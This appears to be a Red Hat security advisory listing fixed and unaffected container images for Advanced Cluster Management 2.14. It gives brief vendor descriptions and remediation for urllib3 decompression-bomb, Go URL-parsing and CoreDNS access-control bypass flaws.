Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Moderate
urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.
7.5 (High)
Affected products
Fixed
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Vendor Fix
fix
|
Known not affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Threats
Impact
Important
The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in CoreDNS, a DNS server that uses a chain of plugins. This logical vulnerability allows an attacker to bypass DNS access controls. The issue occurs because security plugins, such as 'acl', are evaluated before the 'rewrite' plugin, creating a Time-of-Check Time-of-Use (TOCTOU) flaw. This flaw enables an attacker to circumvent intended access restrictions.
7.7 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
